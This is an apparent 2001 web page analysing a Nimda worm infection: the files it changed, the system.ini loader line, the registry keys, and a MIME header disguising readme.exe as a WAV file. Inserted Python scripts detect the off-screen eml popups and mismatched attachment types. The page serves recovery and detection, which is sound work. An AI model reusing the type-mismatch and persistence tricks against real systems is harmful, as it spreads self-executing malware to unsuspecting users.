eml Viruses
9-19-01
Thank you Microsoft,
it is now possible to spread viruses via HTML files.
It is simple really: just use JavaScript to open an eml file in a new window.
Well, I've just been hit with the W32.NIMDA.A@MM computer worm.
No big surprise here.
The infection appears to be pretty widespread.
This Symantec press release says that "it's kind of bad"; the details are here.
Damage to My System
- New infected system file: C:\WIN98\SYSTEM\load.exe (run via system.ini)
- Replaced system file: C:\WIN98\SYSTEM\riched20.dll (called by WinWord and others)
- The Internet Explorer History was deleted (C:\WIN98\History).
- Two of the Windows Explorer preferences were changed:
  - "Do not show hidden or system files" - was "Show all files"
  - "Hide file extensions for known file types" - was unchecked
- 2 eml files added to PWS executable directories
- Several .tmp and .tmp.exe files in C:\WIN98\temp
- MS Word is broken (this may be a separate problem):
  - 2 main menu selections are gone - View and Insert
  - Find is missing from the Edit menu
  - Toolbar customize (right-click and select Customize) no longer works
riched20.dll should be 422 KB;
after infection it was 56 KB.
Since this dll is used by various applications,
some parts of the system no longer worked.
I used the System File Checker (c:\win98\system\sfc.exe) to repair
this problem (i.e., replace the file).
At the time of the infection
I was running the Microsoft Personal Web Server (PWS).
The following 2 files were written to directories
configured in PWS to contain executable content.
setup.eml 78 KB
multimonitor.eml 78 KB
These 2 identical files are actually email messages
which contain the MIME-encoded worm readme.exe.
However, because the MIME type is
listed as an audio file,
Microsoft Exchange will try to play the "sound" file.
Of course, Windows will realize that it is actually an exe
file and execute it WITHOUT ASKING YOU.
This is the system.ini line which loads the worm.
shell=explorer.exe load.exe -dontrunold
The MS Word problem was solved by locating and re-naming
normal.dot. When re-started, MS Word simply created a new one
and only the changes I had made were lost.
HTML Code
The following code is from an infected web page.
I won't identify the URL since it is a
very respected site that was obviously hacked.
Simply visiting the page infected MY machine with the virus.
(I added the "xx" to the extension so that my example should be safe.)
The rest of the page is here.
The following was added as a single line at the bottom of the page.
I have reformatted it so that it is easier to read.
Notice that the window is opened way off the screen so that the user
is kept clueless.
I can't believe that JavaScript can be used to open another application.
(On the other hand, VBScript does allow this sort of thing.)
On the plus side, my Symantec virus check software located several infected
html files in the Internet Explorer cache.
Since all of them were from a single web site, I'm pretty sure
that those are the files that infected my system.
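Since the infected pages in the browser cache were what the virus checker found, a cache scan for the pattern described above (a script that opens one of the mail-message file types in a window placed off screen) is the natural detection step. The script below is an added example written for this page, not the page's own code and not Symantec's; the two HTML documents it scans are constructed samples, and the 6000-pixel offset threshold, the file names and the four extensions (taken from the registry section of this page) are assumptions.

```python
import re
import tempfile
from pathlib import Path

# The four file extensions this page identifies as mapped to message/rfc822.
RISKY_EXT = ("eml", "nws", "mht", "mhtml")

# A window.open() call whose first argument is a file with one of those extensions.
# Case-insensitive; tolerates whitespace and either quote style.
_OPEN_RE = re.compile(
    r"window\.open\s*\(\s*['\"]([^'\"]+\.(?:" + "|".join(RISKY_EXT) + r"))['\"]",
    re.IGNORECASE,
)
# A window-feature string that parks the popup far off screen (top=/left= of 4+ digits).
_OFFSCREEN_RE = re.compile(r"\b(top|left)\s*=\s*(\d{4,})", re.IGNORECASE)

# Constructed sample: an ordinary page whose only popup is a normal help window.
CLEAN_HTML = (
    '<html><body><p>Real page content.</p>'
    '<script>window.open("help.html", "_blank", "width=400,height=300");</script>'
    '</body></html>'
)

# Constructed sample modelled on the page's description: a script block appended
# after the real document that opens a .eml file in a window placed off screen.
SUSPECT_HTML = (
    '<html><body><p>Real page content.</p></body></html>\n'
    '<script language="JavaScript">'
    'window.open("sample.eml", null, "resizable=no,top=6000,left=6000");'
    '</script>'
)


def scan_html(text):
    """Return one finding per window.open() that targets a risky extension.

    Each finding records the target file and whether the feature string that
    follows the call places the window off screen."""
    findings = []
    for m in _OPEN_RE.finditer(text):
        # Look at the remainder of the call for the placement arguments.
        tail = text[m.end(): m.end() + 200]
        findings.append({
            "target": m.group(1),
            "offscreen": bool(_OFFSCREEN_RE.search(tail)),
        })
    return findings


def scan_cache_dir(directory):
    """Scan every .htm/.html file under directory; return {path: findings} for hits only."""
    hits = {}
    for path in Path(directory).rglob("*"):
        if path.suffix.lower() not in (".htm", ".html"):
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable cache entry; skip rather than abort the scan
        findings = scan_html(text)
        if findings:
            hits[str(path)] = findings
    return hits


def demo():
    """Write both constructed samples into a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "clean.htm").write_text(CLEAN_HTML)
        Path(d, "suspect.html").write_text(SUSPECT_HTML)
        return scan_cache_dir(d)


if __name__ == "__main__":
    for path, findings in demo().items():
        print(path, findings)
```

Point scan_cache_dir at the browser cache directory (on the Windows 98 system described here that would be under C:\WIN98, though the exact path is not given on this page) and treat any hit with "offscreen": True as a page to quarantine; a hit without the off-screen flag still deserves a look, since a legitimate page rarely opens a mail message in a popup.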
Relevant Registry Entries
This is the real problem -
these registry keys allow Windows to execute
files without your permission.
[HKEY_CLASSES_ROOT\.eml]
@="Microsoft Internet Mail Message"
"Content Type"="message/rfc822"
[HKEY_CLASSES_ROOT\Microsoft Internet Mail Message\shell\open\command]
@="\"C:\\PROGRAM FILES\\OUTLOOK EXPRESS\\MSIMN.EXE\" /eml:%1"
[HKEY_CLASSES_ROOT\.mht]
@="mhtmlfile"
"Content Type"="message/rfc822"
[HKEY_CLASSES_ROOT\.mhtml]
@="mhtmlfile"
"Content Type"="message/rfc822"
[HKEY_CLASSES_ROOT\.nws]
@="Microsoft Internet News Message"
"Content Type"="message/rfc822"
[HKEY_CLASSES_ROOT\Microsoft Internet News Message\shell\open\command]
@="\"C:\\PROGRAM FILES\\OUTLOOK EXPRESS\\MSIMN.EXE\" /nws:%1"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\message/rfc822]
"CLSID"="{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}"
[HKEY_CLASSES_ROOT\CLSID\{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}\InProcServer32]
@="C:\\WIN98\\SYSTEM\\MSHTML.DLL"
"ThreadingModel"="Apartment"
As you can see, there are 4 at-risk extensions: eml, mht, mhtml and nws.
Based on experiments,
it appears that the real danger is through the MIME mapping.
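The chain the registry dump above shows (extension, to Content Type message/rfc822, to the MIME database CLSID, to MSHTML.DLL) is easy to audit mechanically from a .reg export. The parser and audit below are an added example for this page, not the page's own code; the registry text it reads is the page's own keys in .reg export format, plus a constructed .txt entry as a control, and the dictionary layout of the report is an assumption.

```python
# Constructed .reg-format excerpt: the keys listed on this page, plus a .txt
# control entry that should not be reported.
REG_TEXT = r'''
[HKEY_CLASSES_ROOT\.eml]
@="Microsoft Internet Mail Message"
"Content Type"="message/rfc822"

[HKEY_CLASSES_ROOT\Microsoft Internet Mail Message\shell\open\command]
@="\"C:\\PROGRAM FILES\\OUTLOOK EXPRESS\\MSIMN.EXE\" /eml:%1"

[HKEY_CLASSES_ROOT\.mht]
@="mhtmlfile"
"Content Type"="message/rfc822"

[HKEY_CLASSES_ROOT\.txt]
@="txtfile"
"Content Type"="text/plain"

[HKEY_CLASSES_ROOT\MIME\Database\Content Type\message/rfc822]
"CLSID"="{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}"

[HKEY_CLASSES_ROOT\CLSID\{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}\InProcServer32]
@="C:\\WIN98\\SYSTEM\\MSHTML.DLL"
"ThreadingModel"="Apartment"
'''

HKCR = "HKEY_CLASSES_ROOT\\"


def _unquote(v):
    """Strip the double quotes of a .reg string value and undo its \\ and \" escapes."""
    if len(v) >= 2 and v[0] == '"' and v[-1] == '"':
        return v[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return v


def parse_reg(text):
    """Parse .reg-style text into {key_path: {value_name: value}}.

    The default value of a key is stored under the name '@', as in the file."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        if current is None:
            continue
        name, sep, value = line.partition("=")
        if not sep:
            continue
        name = name.strip()
        if name != "@":
            name = name.strip('"')
        keys[current][name] = _unquote(value.strip())
    return keys


def audit_rfc822(keys):
    """Report every extension whose Content Type is message/rfc822.

    For each one, resolve the ProgID's shell\\open\\command and the in-process
    server registered for the message/rfc822 MIME type, which is the path the
    page identifies as the real danger."""
    mime_key = HKCR + r"MIME\Database\Content Type\message/rfc822"
    clsid = keys.get(mime_key, {}).get("CLSID")
    server = None
    if clsid:
        server = keys.get(HKCR + "CLSID\\" + clsid + "\\InProcServer32", {}).get("@")

    report = []
    for key, values in keys.items():
        if not key.startswith(HKCR + "."):
            continue  # only extension keys
        if values.get("Content Type", "").lower() != "message/rfc822":
            continue
        progid = values.get("@")
        command = keys.get(HKCR + str(progid) + "\\shell\\open\\command", {}).get("@")
        report.append({
            "extension": key[len(HKCR):],
            "progid": progid,
            "open_command": command,
            "mime_handler": server,
        })
    return report


if __name__ == "__main__":
    for entry in audit_rfc822(parse_reg(REG_TEXT)):
        print(entry)
```

Run it against a full export (regedit's Export in .reg format) to see which extensions on a machine route through message/rfc822; in the excerpt, .mht is reported with no open command because the mhtmlfile ProgID's command key is not among the keys the page lists.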
MIME Header
This is the malformed header from the eml file.
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID:
The MIME code is here.
--====_ABC1234567890DEF_====
Other Extensions
This exploit is not limited to just exe files.
It can be used with all the executable file extensions;
pif and scr (Screen Saver) are quite common.
See McAfee's notes on the
W32/Badtrans@MM virus
for numerous examples.
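The header above and the note on other extensions describe one detectable signature: a MIME part whose declared type is an audio (or image, or text) type but whose name parameter carries an executable extension. The checker below is an added example written for this page, not the page's own code and not McAfee's or Symantec's; the message it parses is a constructed sample built around the page's header (the boundary string and the audio/x-wav part named readme.exe), with a harmless base64 body substituted for the worm. The extension list covers the three the page names (exe, pif, scr) plus com and bat as an assumption, and the set of "inert" type prefixes is also an assumption.

```python
import email
import os

# Extensions Windows treats as runnable; exe, pif and scr are the ones this page names.
EXECUTABLE_EXT = {".exe", ".pif", ".scr", ".com", ".bat"}

# Declared media types that should never carry a runnable attachment.
INERT_PREFIXES = ("audio/", "image/", "text/", "video/")

# Constructed sample message: the page's boundary and header, a plain-text
# part, and an image part as a control. The base64 bodies are harmless text.
SAMPLE_MESSAGE = """\
From: sender@example.invalid
To: recipient@example.invalid
Subject: constructed sample
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="====_ABC1234567890DEF_===="

--====_ABC1234567890DEF_====
Content-Type: text/plain; charset=us-ascii

This body text is harmless.

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
 name="readme.exe"
Content-Transfer-Encoding: base64

Y29uc3RydWN0ZWQgcGF5bG9hZA==

--====_ABC1234567890DEF_====
Content-Type: image/gif;
 name="chart.gif"
Content-Transfer-Encoding: base64

Y29uc3RydWN0ZWQgaW1hZ2U=

--====_ABC1234567890DEF_====--
"""


def suspicious_parts(raw_message):
    """Return the parts whose name has an executable extension but whose
    declared Content-Type is an inert media type.

    That mismatch is the trick described on this page: the mail client trusts
    the type, Windows trusts the extension."""
    msg = email.message_from_string(raw_message)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue  # containers carry no payload of their own
        ctype = part.get_content_type()          # e.g. "audio/x-wav"
        filename = part.get_filename() or ""     # falls back to the name= parameter
        ext = os.path.splitext(filename)[1].lower()
        if ext in EXECUTABLE_EXT and ctype.startswith(INERT_PREFIXES):
            findings.append({"filename": filename, "content_type": ctype})
    return findings


if __name__ == "__main__":
    for finding in suspicious_parts(SAMPLE_MESSAGE):
        print("mismatched part:", finding)
```

A mail gateway or a quarantine script can apply the same test to every message: the text part has no name and is skipped, chart.gif matches its image/gif type, and only the audio/x-wav part named readme.exe is reported.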
Note
I know that Microsoft has gone way out of its way to describe these
problems without giving specific data.
From a general security point of view, I support that approach.
However, since I know of companies losing whole days because of these
problems, I decided to publish explicit details (as far as I know them).
This is no longer a "hide the details" issue;
we're now in disaster recovery
and explicit details are necessary to accomplish that.
Most of the details are also given by
Symantec.
References
Author:
Robert Clemenzi